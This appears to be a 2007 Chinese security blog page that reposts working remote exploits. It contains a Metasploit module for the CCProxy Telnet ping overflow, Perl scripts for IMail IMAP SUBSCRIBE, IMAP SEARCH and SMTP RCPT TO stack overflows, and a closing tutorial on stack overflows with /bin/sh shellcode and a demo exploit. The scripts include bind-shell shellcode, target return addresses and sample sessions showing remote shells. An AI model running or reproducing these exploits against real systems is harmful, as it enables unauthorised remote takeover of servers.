CNsHaRk BLog - EXPLOIT

CCProxy <= v6.2 Telnet Proxy Ping Overflow Exploit

support@cnshark.net(admin) — Wed,05 Sep 2007 12:30:08 +0800

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

module Msf

class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote

include Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
'Description' => %q{
            This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service.
The stack is overwritten when sending an overly long address to the 'ping' command.
},
'Author' => [ 'Patrick Webster ' ],
'Arch' => [ ARCH_X86 ],
'License'       => MSF_LICENSE,
'Version'       => '$Revision$',
'References'    =>
[
[ 'BID', '11666 ' ],
[ 'CVE', '2004-2416' ],
[ 'MIL', '621' ],
[ 'OSVDB', '11593' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1012,
'BadChars' => "\x00\x07\x08\x0a\x0d",
},
'Platform' => ['win'],
'Targets' =>
[
# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
[
'Windows 2000 Pro All - English',
{
'Ret' => 0x75023411, # call esi ws2help.dll
}
],
[
'Windows 2000 Pro All - Italian',
{
'Ret' => 0x74fd2b81, # call esi ws2help.dll
}
],
[
'Windows 2000 Pro All - French',
{
'Ret' => 0x74fa2b22, # call esi ws2help.dll
}
],
                 [
'Windows XP SP0/1 - English',
{
'Ret' => 0x71aa1a97, # call esi ws2help.dll
}
],
                 [
'Windows XP SP2 - English',
{
'Ret' => 0x71aa1b22, # call esi ws2help.dll
}
],
],
'DisclosureDate' => 'Nov 11 2004'))

register_options(
[
Opt::RPORT(23),
], self.class)
end

def autofilter
false
end

def check
connect
banner = sock.get_once(-1,3)

if (banner =~ /CCProxy Telnet Service Ready/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end

def exploit
connect

sploit  = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
sock.put(sploit + "\r\n")

handler
disconnect
end

end
end

IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote O

support@cnshark.net(admin) — Thu,23 Aug 2007 20:43:01 +0800

还是幻影出的，这次是云舒写的。

来源：milw0rm
#!/use/bin/perl

# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1
# Code by yunshu, our team: www.ph4nt0m.org Mail list: http://list.ph4nt0m.org

#F:\>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass
#* OK IMAP4 Server (IMail 9.10)
#0 OK LOGIN completed
#* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
#* 0 EXISTS
#* 0 RECENT
#* OK [UIDVALIDITY 1185270594] UIDs valid
#* OK [UIDNEXT 485270595] Predicted next UID
#2 OK [READ-WRITE] Select completed
#3 OK SUBSCRIBE completed
#Trying..
#Bingle!Maybe get it!
#You can try to telnet 22 port, do you have nc?

#D:\Microsoft Visual Studio 8\VC>nc -vv 192.168.1.2 22
#192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA
#(UNKNOWN) [192.168.1.2] 22 (?) open
#Microsoft Windows [.. 5.2.3790]
#(C) .... 1985-2003 Microsoft Corp.

#C:\WINDOWS\system32>net user
#net user

#\\ .....

#-------------------------------------------------------------------------------
#Administrator ASPNET Guest
#IUSR_WIN2K3 IWAM_WIN2K3 SUPPORT_388945a0
#..................

#C:\WINDOWS\system32>

use strict;
use warnings;
use IO::Socket;

if( @ARGV != 3 )
{
  my $banner = qq{
Imail subscribe exploit, Test on Imail 2006(9.10),windows 2003 Chinese SP1
You must have a account to login the imap server, good luck!
Code by yunshu, our team www.ph4nt0m.org, enjoin this exp~~

imail_subscribe.pl
};

  print $banner."\n";

  exit( -1 );
}

my $host = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];

# win32_bind - EXITFUNC=thread LPORT=22 Size=344 Encoder=Pex http://metasploit.com
my $shellcode =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x41".
"\xd1\xfd\xbc\x83\xeb\xfc\xe2\xf4\xbd\xbb\x16\xf1\xa9\x28\x02\x43".
"\xbe\xb1\x76\xd0\x65\xf5\x76\xf9\x7d\x5a\x81\xb9\x39\xd0\x12\x37".
"\x0e\xc9\x76\xe3\x61\xd0\x16\xf5\xca\xe5\x76\xbd\xaf\xe0\x3d\x25".
"\xed\x55\x3d\xc8\x46\x10\x37\xb1\x40\x13\x16\x48\x7a\x85\xd9\x94".
"\x34\x34\x76\xe3\x65\xd0\x16\xda\xca\xdd\xb6\x37\x1e\xcd\xfc\x57".
"\x42\xfd\x76\x35\x2d\xf5\xe1\xdd\x82\xe0\x26\xd8\xca\x92\xcd\x37".
"\x01\xdd\x76\xcc\x5d\x7c\x76\xfc\x49\x8f\x95\x32\x0f\xdf\x11\xec".
"\xbe\x07\x9b\xef\x27\xb9\xce\x8e\x29\xa6\x8e\x8e\x1e\x85\x02\x6c".
"\x29\x1a\x10\x40\x7a\x81\x02\x6a\x1e\x58\x18\xda\xc0\x3c\xf5\xbe".
"\x14\xbb\xff\x43\x91\xb9\x24\xb5\xb4\x7c\xaa\x43\x97\x82\xae\xef".
"\x12\x82\xbe\xef\x02\x82\x02\x6c\x27\xb9\xfd\xaa\x27\x82\x74\x5d".
"\xd4\xb9\x59\xa6\x31\x16\xaa\x43\x97\xbb\xed\xed\x14\x2e\x2d\xd4".
"\xe5\x7c\xd3\x55\x16\x2e\x2b\xef\x14\x2e\x2d\xd4\xa4\x98\x7b\xf5".
"\x16\x2e\x2b\xec\x15\x85\xa8\x43\x91\x42\x95\x5b\x38\x17\x84\xeb".
"\xbe\x07\xa8\x43\x91\xb7\x97\xd8\x27\xb9\x9e\xd1\xc8\x34\x97\xec".
"\x18\xf8\x31\x35\xa6\xbb\xb9\x35\xa3\xe0\x3d\x4f\xeb\x2f\xbf\x91".
"\xbf\x93\xd1\x2f\xcc\xab\xc5\x17\xea\x7a\x95\xce\xbf\x62\xeb\x43".
"\x34\x95\x02\x6a\x1a\x86\xaf\xed\x10\x80\x97\xbd\x10\x80\xa8\xed".
"\xbe\x01\x95\x11\x98\xd4\x33\xef\xbe\x07\x97\x43\xbe\xe6\x02\x6c".
"\xca\x86\x01\x3f\x85\xb5\x02\x6a\x13\x2e\x2d\xd4\xae\x1f\x1d\xdc".
"\x12\x2e\x2b\x43\x91\xd1\xfd\xbc";

my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>"143", proto=>"tcp" ) || die "Connect error.\n";

my $res = <$sock>;
print $res;
if( $res !~ /OK/ )
{
  exit( -1 );
}

my $opcode = "\x60\x1A\x9C\x76";
#my $opcode = "\x61\x62\x63\x64";

my $num = 264991;

my $nop = "#IMAILPUB" . "\x90" x ( $num - length($shellcode) ).$shellcode."\x90\x90\xeb\x06".$opcode."\x90\x90\x90\x90"."\xE9\x44\xfd\xff\xff"."\x90" x 400;

# login
print $sock "0 LOGIN $user $pass\r\n";
$res = <$sock>;
if( ! defined($res) )
{
  exit(-1);
}

print $res;
if( $res !~ /OK/ )
{
  exit(-1);
}

print $sock "2 Select INBOX\r\n";
while( <$sock> )
{
  print $_;
  if( $_ =~ /2 OK/ || $_ =~ /2 BAD/ )
  {
    last;
  }
}

print $sock "3 SUBSCRIBE \"$nop\"\r\n";
$res = <$sock>;
if( ! defined($res) )
{
  exit(-1);
}
print $res;

print "Trying..\n";

sleep( 15 );
print "Bingle! Maybe get it!\nYou can try to telnet 22 port, do you have nc?\n";

print $sock "4 LOGOUT\r\n";
print <$sock>;

$sock->close();

IPSwitch IMail Server 2006 SEARCH Remote Stack Ove

support@cnshark.net(admin) — Thu,23 Aug 2007 20:42:00 +0800

用imail的不少吧？这个exp是幻影出的。

来源：milw0rm

#!/use/bin/perl
#
# Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit
# Author: ZhenHan.Liu#ph4nt0m.org
# Date: 2007-07-25
# Team: Ph4nt0m Security Team (http://www.ph4nt0m.org)
#
# Vuln Found by: Manuel Santamarina Suarez
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=563
#
# The Vuln code is here (imap4d32.exe version 6.8.8.1)
# 00418CCA |. 8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8]
# 00418CD0 |. 0FBE11 |MOVSX EDX,BYTE PTR DS:[ECX]
# 00418CD3 |. 83FA 22 |CMP EDX,22
# 00418CD6 |. 75 2A |JNZ SHORT IMAP4D32.00418D02
# 00418CD8 |. 8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
# 00418CDE |. 50 |PUSH EAX ; /String
# 00418CDF |. FF15 84004300 |CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>>; \lstrlenA
# 00418CE5 |. 83E8 02 |SUB EAX,2
# 00418CE8 |. 50 |PUSH EAX ; /maxlen
# 00418CE9 |. 8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8] ; |
# 00418CEF |. 83C1 01 |ADD ECX,1 ; |
# 00418CF2 |. 51 |PUSH ECX ; |src
# 00418CF3 |. 8D55 AC |LEA EDX,DWORD PTR SS:[EBP-54] ; |
# 00418CF6 |. 52 |PUSH EDX ; |dest
# 00418CF7 |. FF15 00024300 |CALL DWORD PTR DS:[<&MSVCR71.strncpy>] ; \strncpy
# 00418CFD |. 83C4 0C |ADD ESP,0C
# 00418D00 |. EB 13 |JMP SHORT IMAP4D32.00418D15
# 00418D02 |> 8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8]
# 00418D08 |. 50 |PUSH EAX ; /src
# 00418D09 |. 8D4D AC |LEA ECX,DWORD PTR SS:[EBP-54] ; |
# 00418D0C |. 51 |PUSH ECX ; |dest
# 00418D0D |. E8 7E610100 |CALL ; \strcpy
# 00418D12 |. 83C4 08 |ADD ESP,8
#
# The programmer has made an extreamly stupid mistake.
# He checks the arg's first byte, if it is 0x22( " ),then invoke strcpy,
# else strncpy.
# the buffer overflow takes place when the strcpy is called.
# But the strncpy is also vulnerable,because it just likes this: strncpy(dest, src, strlen(src));
# So, whether the command was started with a '"' or not, the stack overflow will take place immediately.
#
# Multiple SEARCH COMMAND is vulnerable,in this case, we use "SEARCH ON".
# But others like "SEARCH BEFORE" command will also trigger the overflow.
#
# NOTES: To trigger the Vuln, there must be at least one mail in the mailbox!!
#
# Badchar is: 0x00 0x0a 0x0d 0x0b 0x09 0x0c 0x20
#
# Tested On Windows 2003 SP1 CN
#
# D:\>perl imap.pl 192.168.226.128 143
# * OK IMAP4 Server (IMail 9.10)
# 0 OK LOGIN completed
# * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
# * 1 EXISTS
# * 1 RECENT
# * OK [UIDVALIDITY 1185337300] UIDs valid
# * OK [UIDNEXT 485337302] Predicted next UID
# 2 OK [READ-WRITE] Select completed
# -------------- [BEGIN] -------------------
# ---------------- [END] ------------------
#
#
# D:\>nc -vv -n 192.168.226.128 1154
# (UNKNOWN) [192.168.226.128] 1154 (?) open
# Microsoft Windows [°æ±¾ 5.2.3790]
# (C) °æÈ¨ËùÓÐ 1985-2003 Microsoft Corp.
#
# C:\WINDOWS\system32>
#
#

use strict;
use warnings;
use IO::Socket;

#Target IP
my $host = shift ;
my $port = shift ;
my $account = "void";
my $password = "ph4nt0m.org";

my $pad1 = "void[at]ph4nt0m.org_" x 4 . "ph4nt0m";
my $pad2 = 'void[at]pstgroup';
my $jmpesp = "\x12\x45\xfa\x7f"; # Windows 2000/xp/2003 Universal

# win32_bind - EXITFUNC=thread LPORT=1154 Size=344 Encoder=Pex http://metasploit.com
my $shellcode =
"\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xb6".
"\x78\xf8\x75\x83\xee\xfc\xe2\xf4\x4a\x12\x13\x38\x5e\x81\x07\x8a".
"\x49\x18\x73\x19\x92\x5c\x73\x30\x8a\xf3\x84\x70\xce\x79\x17\xfe".
"\xf9\x60\x73\x2a\x96\x79\x13\x3c\x3d\x4c\x73\x74\x58\x49\x38\xec".
"\x1a\xfc\x38\x01\xb1\xb9\x32\x78\xb7\xba\x13\x81\x8d\x2c\xdc\x5d".
"\xc3\x9d\x73\x2a\x92\x79\x13\x13\x3d\x74\xb3\xfe\xe9\x64\xf9\x9e".
"\xb5\x54\x73\xfc\xda\x5c\xe4\x14\x75\x49\x23\x11\x3d\x3b\xc8\xfe".
"\xf6\x74\x73\x05\xaa\xd5\x73\x35\xbe\x26\x90\xfb\xf8\x76\x14\x25".
"\x49\xae\x9e\x26\xd0\x10\xcb\x47\xde\x0f\x8b\x47\xe9\x2c\x07\xa5".
"\xde\xb3\x15\x89\x8d\x28\x07\xa3\xe9\xf1\x1d\x13\x37\x95\xf0\x77".
"\xe3\x12\xfa\x8a\x66\x10\x21\x7c\x43\xd5\xaf\x8a\x60\x2b\xab\x26".
"\xe5\x2b\xbb\x26\xf5\x2b\x07\xa5\xd0\x10\xfc\xf7\xd0\x2b\x71\x94".
"\x23\x10\x5c\x6f\xc6\xbf\xaf\x8a\x60\x12\xe8\x24\xe3\x87\x28\x1d".
"\x12\xd5\xd6\x9c\xe1\x87\x2e\x26\xe3\x87\x28\x1d\x53\x31\x7e\x3c".
"\xe1\x87\x2e\x25\xe2\x2c\xad\x8a\x66\xeb\x90\x92\xcf\xbe\x81\x22".
"\x49\xae\xad\x8a\x66\x1e\x92\x11\xd0\x10\x9b\x18\x3f\x9d\x92\x25".
"\xef\x51\x34\xfc\x51\x12\xbc\xfc\x54\x49\x38\x86\x1c\x86\xba\x58".
"\x48\x3a\xd4\xe6\x3b\x02\xc0\xde\x1d\xd3\x90\x07\x48\xcb\xee\x8a".
"\xc3\x3c\x07\xa3\xed\x2f\xaa\x24\xe7\x29\x92\x74\xe7\x29\xad\x24".
"\x49\xa8\x90\xd8\x6f\x7d\x36\x26\x49\xae\x92\x8a\x49\x4f\x07\xa5".
"\x3d\x2f\x04\xf6\x72\x1c\x07\xa3\xe4\x87\x28\x1d\x59\xb6\x18\x15".
"\xe5\x87\x2e\x8a\x66\x78\xf8\x75";

my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>$port, proto=>"tcp" ) || die "Connect error.\n";

my $res = <$sock>;
print $res;
if( $res !~ /OK/ )
{
  exit(-1);
}

# login
print $sock "0 LOGIN $account $password\r\n";
print $res = <$sock>;
if( $res !~ /0 OK/ )
{
  exit(-1);
}

# select
print $sock "1 Select INBOX\r\n";
while(1)
{
  print $res = <$sock>;
  if($res =~ /1 OK/)
  {  last; }
  elsif($res =~ /1 NO/ || $res =~ /BAD/)
  {   exit(-1); }
  else
  {  next; }
}

# search
my $payload = $pad1.$jmpesp.$pad2.$shellcode;
print $sock "2 SEARCH ON <$payload>\r\n";

$sock->close();

Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow E

support@cnshark.net(admin) — Sun,06 May 2007 23:20:47 +0800

#!/usr/bin/perl
# http://www.zerodayinitiative.com/advisories/ZDI-06-028.html
# http://www.securityfocus.com/bid/19885
#
# acaro [at] jervus.it

use IO::Socket::INET;
use Switch;

if (@ARGV < 3) {
print "--------------------------------------------------------------------\n";
print "Usage : Imail-rcpt-overflow.pl -hTargetIPAddress -oTargetReturnAddress\n";
print " Return address: \n";
print " o1 - IMail 8.12 Version\n";
print " o2 - IMail 8.10 Versio\n";
print " Example for IMail 8.12 Version: ./Imail-rcpt-overflow.pl -h127.0.0.1 -o1 \n";
print "--------------------------------------------------------------------\n";
}

use IO::Socket::INET;

my $host = 10.0.0.2;
my $port = 25;
my $reply;
my $request;
my $happystack="\x81\xc4\xff\xef\xff\xff\x44";

foreach (@ARGV) {
$host = $1 if (___FCKpd___0
=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
$eip = $1 if (___FCKpd___0
=~/-o(.*)/);
}

switch ($eip) {
case 1 { $eip="\xc4\x91\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.12
case 2 { $eip="\xc3\x88\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.10
}

# win32_bind -  EXITFUNC=seh LPORT=4444

my $shellcode  = "\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93".
"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9".
"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd".
"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf".
"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e".
"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd".
"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd".
"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66".
"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6".
"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34".
"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65".
"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7".
"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e".
"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f".
"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61".
"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66".
"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b".
"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9".
"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67".
"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6".
"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69".
"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36";

my $nop="\x41"x137;

my $buffer = "RCPT TO:"."\x20\x3c\x40".$eip . "\x3a" .$nop.$happystack.$shellcode."\x4a\x61\x63\x3e"."\n";

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

$request = "EHLO " . "\r\n";
send $socket, $request, 0;
print "[+] Sent  EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

$request = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";
send $socket, $request, 0;
print "[+] Sent  MAIL FROM\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

$request = $buffer;
send $socket, $request, 0;
print "[+] Sent malicius request\n";
close $socket;

print " + connect on port 4444 of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;

# milw0rm.com [2007-02-04]

溢出的基础与原理

support@cnshark.net(admin) — Tue,01 May 2007 10:17:00 +0800

一：基础知识
计算机内存运行分配的区域分为3个
程序段区域：不允许写的
数据段区域：静态全局变量是位于数据段并且在程序开始运行的时候被加载
堆栈区域：放置程序的动态的用于计算的局部和临时变量则分配在堆栈里面和在过程调用中压入的返回地
址数据。堆栈是一个先入后出的队列。一般计算机系统堆栈的方向与内存的方向相反。压栈的xx作push＝ ESP－4，出栈的xx作是pop=ESP+4. 在一次函数调用中，堆栈中将被依次压入：参数，返回地址，EBP。如果函数有局部变量，接下来，就在堆栈中开辟相应的空间以构造变量。函数执行结束，这些局部变量的内容将被丢失。但是不被清除。在函数返回的时候，弹出EBP，恢复堆栈到函数调用的地址,弹出返回地址到EIP以继续执行程序。
在C语言程序中，参数的压栈顺序是反向的。比如func（a,b,c）。在参数入栈的时候，是：先压c，再压 b,最后a.在取参数的时候，
指令执行的图例：
指令区域
执行程序区
0 1 2 3
0
4
8 调用100处的函数，参数1（3位），2（10位）
C
10 0 1 2 3
100 执行处理
104
108
10C
110 返回调用堆栈区域
0 1 2 3
如果EBP分配的空间不够xx作就是产生溢出的地方
200 保存以前的EBP4位（数据段的指针，用于可以使用局部动态
变量）现在的EBP等于当前的ESP-动态数据的大小值，
ESP=200
204 0C 00 00 00
此处是程序的返回地址
208 参数1，填充1位
20C 参数2填充2位
210
讲解例子WIN下的程序DEMO，演示参数导致的返回地址的变化
讲清主要4位的填充问题
另外溢出还会导致数据段的改变 3：如何利用堆栈溢出
原理可以概括为：由于字符串处理函数（gets，strcpy等等）没有对数组越界加以监视和限制，我们利用字符数组写越界，覆盖堆栈中的老元素的值，就可以修改返回地址。在DEMO的例子中，这导致CPU去访问一个不存在的指令，结果出错。事实上，我们已经完全的控制了这个程序下一步的动作。如果我们用一个实际存在指令地址来覆盖这个返回地址，CPU就会转而执行我们的指令。那么有什么用呢，就算使得我们的程序可以跳转执行一些代码，如何用他来突破系统限制来获得权限呢？二：系统权限知识
UNIX系统在运行的时候的权限检查主要是根据UID，GID，SID 三个标来检查的，主要根据SID来检查权限
SU系统调用就是SID变成SU的对象
S粘贴位使得运行程序的人具有该程序拥有者一样的权限
中断ROOT的S粘贴位的程序就可以获得超级用户的权限，SID位置没被调用返回修改回来。
VI的S粘贴位可以中断的例子在UINX系统中，我们的指令可以执行一个shell，这个shell将获得和被我们堆栈溢出的程序相同的权限。如果这个程序是setuid的，那么我们就可以获得root shell。三：溢出突破权限的实现
首先要编写SHELLCODE的2进制代码作为溢出的参数进行传入：
shellcode的C程序注意：execve函数将执行一个程序。他需要程序的名字地址作为第一个参数。一个内容为该程序的 argv[i]（argv[n-1]=0）的指针数组作为第二个参数，以及(char*) 0作为第三个参数。
我们来看以看execve的汇编代码：
0x804ce7c <__execve>: push %ebp ‘保存以前的数据段地址 0x804ce7d <__execve+1>: mov %esp,%ebp ‘使得当前数据段指向堆栈 0x804ce7f <__execve+3>: push %edi 0x804ce80 <__execve+4>: push %ebx ‘保存 0x804ce81 <__execve+5>: mov 0x8(%ebp),%edi ‘ebp+8是第一个参数"/bin/sh\0" 0x804ce84 <__execve+8>: mov $0x0,%eax ‘清0 0x804ce89 <__execve+13>: test %eax,%eax 0x804ce8b <__execve+15>: je 0x804ce92 <__execve+22> 0x804ce8d <__execve+17>: call 0x0 0x804ce92 <__execve+22>: mov 0xc(%ebp),%ecx ‘设置NAME[0]参数，4字节对齐 0x804ce95 <__execve+25>: mov 0x10(%ebp),%edx，设置NAME[1]参数，4字节对齐 0x804ce98 <__execve+28>: push %ebx 0x804ce99 <__execve+29>: mov %edi,%ebx 0x804ce9b <__execve+31>: mov $0xb,%eax ‘设置XB号调用 0x804cea0 <__execve+36>: int $0x80 ‘调用执行 0x804cea2 <__execve+38>: pop %ebx 0x804cea3 <__execve+39>: mov %eax,%ebx 0x804cea5 <__execve+41>: cmp $0xfffff000,%ebx 0x804ceab <__execve+47>: jbe 0x804cebb <__execve+63> 0x804cead <__execve+49>: call 0x8048324 <__errno_location> 0x804ceb2 <__execve+54>: neg %ebx 0x804ceb4 <__execve+56>: mov %ebx,(%eax) 0x804ceb6 <__execve+58>: mov $0xffffffff,%ebx 0x804cebb <__execve+63>: mov %ebx,%eax 0x804cebd <__execve+65>: lea 0xfffffff8(%ebp),%esp 0x804cec0 <__execve+68>: pop %ebx 0x804cec1 <__execve+69>: pop %edi 0x804cec2 <__execve+70>: leave 0x804cec3 <__execve+71>: ret 精练的调用方法是 0x804ce92 <__execve+22>: mov 0xc(%ebp),%ecx ‘设置NAME[0]参数，4字节对齐 0x804ce95 <__execve+25>: mov 0x10(%ebp),%edx，设置NAME[1]参数，4字节对齐 0x804ce9b <__execve+31>: mov $0xb,%eax ‘设置XB号调用 0x804cea0 <__execve+36>: int $0x80 ‘调用执行另外要执行一个exit（）系统调用，结束shellcode的执行。 0x804ce60 <_exit>: mov %ebx,%edx 0x804ce62 <_exit+2>: mov 0x4(%esp,1),%ebx 设置参数0 0x804ce66 <_exit+6>: mov $0x1,%eax ‘1号调用 0x804ce6b <_exit+11>: int $0x80 0x804ce6d <_exit+13>: mov %edx,%ebx 0x804ce6f <_exit+15>: cmp $0xfffff001,%eax 0x804ce74 <_exit+20>: jae 0x804d260 <__syscall_error> 那么总结一下，合成的汇编代码为： mov 0xc(%ebp),%ecx
mov 0x10(%ebp),%edx
mov $0xb,%eax
int $0x80
mov 0x4(%esp,1),%ebx
mov $0x1,%eax
int $0x80 但问题在于我们必须把这个程序作为字符串的参数传给溢出的程序进行调用，如何来分配和定位字符串“ /bin/sh”,还得有一个name数组。我们可以构造它们出来，可是，在shellcode中如何知道它们的地址呢？每一次程序都是动态加载，字符串和name数组的地址都不是固定的。
利用call压入下一条语句的返回地址，把数据作为下一条指令我们就可以达到目的。
Jmp CALL
Popl %esi ‘利用CALL弹出压入的下一条语句的地址，其实就是我们构造的字符串的地址
movb $0x0,0x7(%esi) ‘输入0的字符串为结尾
mov %esi,0X8 (%esi) ‘构造NAME数组，放如字串的地址作为NAME[0]
mov $0x0,0xc(%esi) ‘构造NAME[1]为NULL， NAME[0]为4位地址，所以偏移为0xc
mov %esi,%ebx ‘设置数据段开始的地址
leal 0x8(%esi),%ecx ‘设置参数1
leal 0xc(%esi),%edx ‘设置参数2
mov $0xb,%eax ‘设置调用号
int $0x80 ‘调用
mov $0x0,%ebx
mov $0x1,%eax
int $0x80
Call popl
.string \"/bin/sh\" 然后通过C编译器编写MYSHELLASM.C
运行出错，原因代码段不允许进行修改，但是对于我们溢出是可以的，原因在于溢出是在数据段运行的，通过GDB查看16进制码，倒出ASCII字符写出TEST.C程序来验证MYSHELLASM可以运行
ret = (int *)&ret + 2; //ret 等于main（）执行完后的返回系统的地址
//(＋2是因为：有pushl ebp ,否则加1就可以了。) 但是在堆栈溢出中，关键在于字符串数组的写越界。但是，gets，strcpy等字符串函数在处理字符串的时候，以"\0" 为字符串结尾。遇\0就结束了写xx作。Myshell中有0X00的字符存在。
把所有赋予0的xx作用异或或者MOV已知为0的寄存器赋值来完成
jmp 0x1f
popl %esi
movl %esi,0x8(%esi)
xorl %eax,%eax
movb %eax,0x7(%esi)
movl %eax,0xc(%esi)
movb $0xb,%al
movl %esi,%ebx
leal 0x8(%esi),%ecx
leal 0xc(%esi),%edx
int $0x80
xorl %ebx,%ebx
movl %ebx,%eax
inc %eax
int $0x80
call -0x24
.string \"/bin/sh\" 汇编得出的
shellcode =
"\x55\x89\xe5\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
我们开始来写一个攻击DEMO溢出的例子
1:把我们的shellcode提供给他，让他可以访问shellcode。
2:修改他的返回地址为shellcode的入口地址。对于strcpy函数，我们要知道被溢出的缓冲的的地址。对于xx作系统来说，一个shell下的每一个程序的堆栈段开始地址都是相同的。我们需要内部写一个调用来获得运行时的堆栈起始地址，来知道了目标程序堆栈的开始地址。
（所有C函数的返回值都放在eax 寄存器里面）:
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
buffer相对于堆栈开始地址的偏移，对于DEMO我们可以计算出来，但对于真正有溢出毛病的程序我们在没有源代码和去跟踪汇编是无法计算出的，只能靠猜测了。不过，一般的程序堆栈大约是几K 左右。为了提高命中率，增加溢出的SHELLCODE的长度和NOP指令，NOP指令的机器码为0x90。同时在我们的程序中允许输入参数来调节溢出点。
#include
#include
#define OFFSET 0
#define RET_POSITION 120
#define RANGE 20
#define NOP 0x90 char shellcode[]=
"\x55\x89\xe5\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
} main(int argc,char **argv)
{
char buff[RET_POSITION+RANGE+1],*ptr;
long addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
int i; if(argc>1)
offset=atoi(argv[1]); sp=get_sp();
addr=sp-offset; for(i=0;i *((long *)&(buff[i]))=addr; for(i=0;i buff[i]=NOP; ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
for(i=0;i *(ptr++)=shellcode[i];
buff[bsize-1]="\0"
for(i=0;i<132;i++) printf("0x%08x\n",buff[i]);
printf("Jump to 0x%08x\n",addr); execl("./demo","demo",buff,0);
}
